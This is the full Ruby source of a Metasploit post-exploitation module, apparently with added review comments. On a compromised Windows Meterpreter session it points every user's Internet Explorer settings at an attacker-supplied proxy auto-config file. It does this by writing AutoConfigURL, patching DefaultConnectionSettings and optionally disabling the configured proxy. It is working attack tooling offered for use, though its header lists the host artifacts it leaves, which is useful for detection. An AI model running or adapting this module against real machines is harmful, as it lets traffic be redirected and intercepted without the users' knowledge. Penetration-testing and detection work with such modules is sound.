Path: blob/master/modules/post/windows/manage/ie_proxypac.rb
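##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that points the per-user Internet Explorer settings of a Windows
# Meterpreter session at a proxy auto-config (PAC) script.
#
# Host artifacts produced by the code below (relevant for detection rules and
# for restoring a host afterwards):
# * LOCAL_PAC mode only: a file named with 6-13 random letters plus ".pac",
#   written under the session's %APPDATA% directory.
# * For every HKEY_USERS subkey whose name contains "S-1-5-21" and does not
#   contain "_Classes":
#   - "AutoConfigURL" (REG_SZ) under ...\Internet Settings
#   - "DefaultConnectionSettings" (REG_BINARY) under
#     ...\Internet Settings\Connections
#   - "ProxyEnable" (REG_DWORD, set to 0) when DISABLE_PROXY is true
#
# The module stores none of the previous values and has no cleanup step, so
# restoring a host means re-setting these values from a baseline taken
# beforehand.
class MetasploitModule < Msf::Post
  include Msf::Post::Windows::Priv
  include Msf::Post::File
  include Msf::Post::Windows::Registry

  # Registers the module metadata and its four options.
  #
  # @param info [Hash] metadata merged into the defaults through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Proxy PAC File',
        'Description' => %q{
          This module configures Internet Explorer to use a PAC proxy file. By using the LOCAL_PAC
          option, a PAC file will be created on the victim host. It's also possible to provide a
          remote PAC file (REMOTE_PAC option) by providing the full URL.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Borja Merino <bmerinofe[at]gmail.com>'],
        'References' => [
          [ 'URL', 'https://www.youtube.com/watch?v=YGjIlbBVDqE&hd=1' ],
          [ 'URL', 'http://blog.scriptmonkey.eu/bypassing-group-policy-using-the-windows-registry' ]
        ],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_config_getenv
            ]
          }
        }
      )
    )

    register_options(
      [
        OptPath.new('LOCAL_PAC', [false, 'Local PAC file.' ]),
        OptString.new('REMOTE_PAC', [false, 'Remote PAC file. (Ex: http://192.168.1.20/proxy.pac)' ]),
        OptBool.new('DISABLE_PROXY', [true, 'Disable the proxy server.', false]),
        OptBool.new('AUTO_DETECT', [true, 'Automatically detect settings.', false])
      ]
    )
  end

  # Entry point: sets the PAC location, then optionally enables auto-detect and
  # disables the static proxy. A failure in the two optional steps is reported
  # but does not abort the run.
  #
  # @return [void]
  def run
    if datastore['LOCAL_PAC'].blank? && datastore['REMOTE_PAC'].blank?
      print_error('You must set a remote or local PAC file. Aborting...')
      return
    end

    # Use the same blank? test as the guard above: an empty REMOTE_PAC string is
    # truthy in Ruby and would otherwise take precedence over a valid LOCAL_PAC,
    # writing an empty AutoConfigURL.
    if datastore['REMOTE_PAC'].blank?
      @remote = false
      print_status('Setting automatic configuration script from local PAC file ...')
      pac_file = create_pac(datastore['LOCAL_PAC'])
      unless pac_file
        print_error('There were problems creating the PAC proxy file. Aborting...')
        return
      end
      res = enable_proxypac(pac_file)
    else
      @remote = true
      print_status('Setting automatic configuration script from a remote PAC file ...')
      res = enable_proxypac(datastore['REMOTE_PAC'])
    end

    unless res
      print_error('Error while setting an automatic configuration script. Aborting...')
      return
    end

    print_good('Automatic configuration script configured...')

    if datastore['AUTO_DETECT']
      print_status('Enabling Automatically Detect Settings...')
      unless auto_detect_on
        print_error('Failed to enable Automatically Detect Settings. Proceeding anyway...')
      end
    end

    if datastore['DISABLE_PROXY']
      print_status('Disabling the Proxy Server...')
      unless disable_proxy
        print_error('Failed to disable Proxy Server. Proceeding anyway...')
      end
    end
  end

  # Copies a PAC file from the operator's machine into the session's %APPDATA%
  # directory under a random "<6-13 letters>.pac" name.
  #
  # @param local_pac [String] path of the PAC file on the local filesystem
  # @return [String, false] the remote path that was written, or false when the
  #   local file is missing, %APPDATA% cannot be read, or the write fails
  def create_pac(local_pac)
    unless ::File.exist?(local_pac)
      print_error('Local PAC file not found.')
      return false
    end

    appdata = session.sys.config.getenv('APPDATA')
    # Without this guard a nil value would raise NoMethodError while the path is
    # being built, instead of producing the clean failure the caller expects.
    if appdata.blank?
      print_error('Could not read APPDATA from the session environment.')
      return false
    end

    pac_file = "#{appdata}\\#{Rex::Text.rand_text_alpha(rand(6..13))}.pac"
    # binread closes the handle; File.open(...).read left it to the GC.
    conf_pac = ::File.binread(local_pac)

    return false unless write_file(pac_file, conf_pac)

    print_status("PAC proxy configuration file written to #{pac_file}")
    pac_file
  end

  # Writes AutoConfigURL for each user hive and patches that hive's
  # DefaultConnectionSettings blob with the value '05'.
  #
  # @param pac [String] a URL (remote mode) or a path on the target, which is
  #   prefixed with "file://"
  # @return [Boolean] true when at least one hive was fully updated
  def enable_proxypac(pac)
    value_auto = 'AutoConfigURL'
    file = @remote ? pac.to_s : "file://#{pac}"
    proxy_pac_enabled = false

    user_internet_settings_keys.each do |key|
      begin
        res = registry_setvaldata(key, value_auto, file, 'REG_SZ')
      rescue ::RuntimeError, Rex::TimeoutError
        next
      end

      next if res.nil? # Rex::Post::Meterpreter::RequestError

      proxy_pac_enabled = true if change_connection(16, '05', "#{key}\\Connections")
    end

    proxy_pac_enabled
  end

  # Patches DefaultConnectionSettings with the value '0D' for each user hive.
  #
  # @return [Boolean] true when at least one hive was updated
  def auto_detect_on
    auto_detect_enabled = false

    user_internet_settings_keys.each do |key|
      next unless change_connection(16, '0D', "#{key}\\Connections")

      print_good('Automatically Detect Settings on.')
      auto_detect_enabled = true
    end

    auto_detect_enabled
  end

  # Sets ProxyEnable to 0 for each user hive.
  #
  # @return [Boolean] true when at least one hive was updated
  def disable_proxy
    value_enable = 'ProxyEnable'
    profile = false

    user_internet_settings_keys.each do |key|
      begin
        res = registry_setvaldata(key, value_enable, 0, 'REG_DWORD')
      rescue ::RuntimeError, Rex::TimeoutError
        next
      end

      # A nil result is treated as a failed write, matching enable_proxypac;
      # previously any call that did not raise was counted as success.
      profile = true unless res.nil?
    end

    return false unless profile

    print_good('Proxy disabled.')
    true
  end

  # Overwrites one byte of the REG_BINARY value DefaultConnectionSettings.
  #
  # The blob is handled as a hex string, so offset 16 addresses byte 8.
  # NOTE(review): presumably that byte holds the connection flags - confirm
  # against the DefaultConnectionSettings layout.
  #
  # @param offset [Integer] index into the hex string (two characters per byte)
  # @param value [String] two hex characters to store at that index
  # @param key [String] full path of the ...\Internet Settings\Connections key
  # @return [Boolean] true when the patched blob was written back
  def change_connection(offset, value, key)
    value_default = 'DefaultConnectionSettings'

    begin
      value_con = registry_getvaldata(key, value_default)
      # The value is absent for profiles that never opened the connection
      # settings; nil.unpack would raise NoMethodError, which is not rescued.
      return false if value_con.nil?

      binary_data = value_con.unpack('H*')[0]
      # A blob shorter than the target byte would be extended or raise
      # IndexError; leave it untouched instead.
      return false if binary_data.length < offset + 2

      binary_data[offset, 2] = value
      # Pack the hex string directly. The former Integer round-trip
      # ('%x' % hex.to_i(16)) dropped leading zero nibbles, which shifts every
      # byte of the blob whenever it starts with a value below 0x10.
      res = registry_setvaldata(key, value_default, [binary_data].pack('H*'), 'REG_BINARY')
    rescue ::RuntimeError, Rex::TimeoutError
      return false
    end

    !res.nil?
  end

  private

  # Lists the Internet Settings key of every user hive loaded under HKEY_USERS.
  #
  # Hives are selected by name: the subkey must contain "S-1-5-21" and must not
  # contain "_Classes". Array() tolerates a nil result.
  # NOTE(review): the registry helpers appear to return nil on a failed request
  # (see the res.nil? check in enable_proxypac); confirm for registry_enumkeys.
  #
  # @return [Array<String>] full registry paths, possibly empty
  def user_internet_settings_keys
    hives = Array(registry_enumkeys('HKU')).select do |hive|
      hive.include?('S-1-5-21') && !hive.include?('_Classes')
    end

    hives.map do |hive|
      "HKEY_USERS\\#{hive}\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings"
    end
  end
end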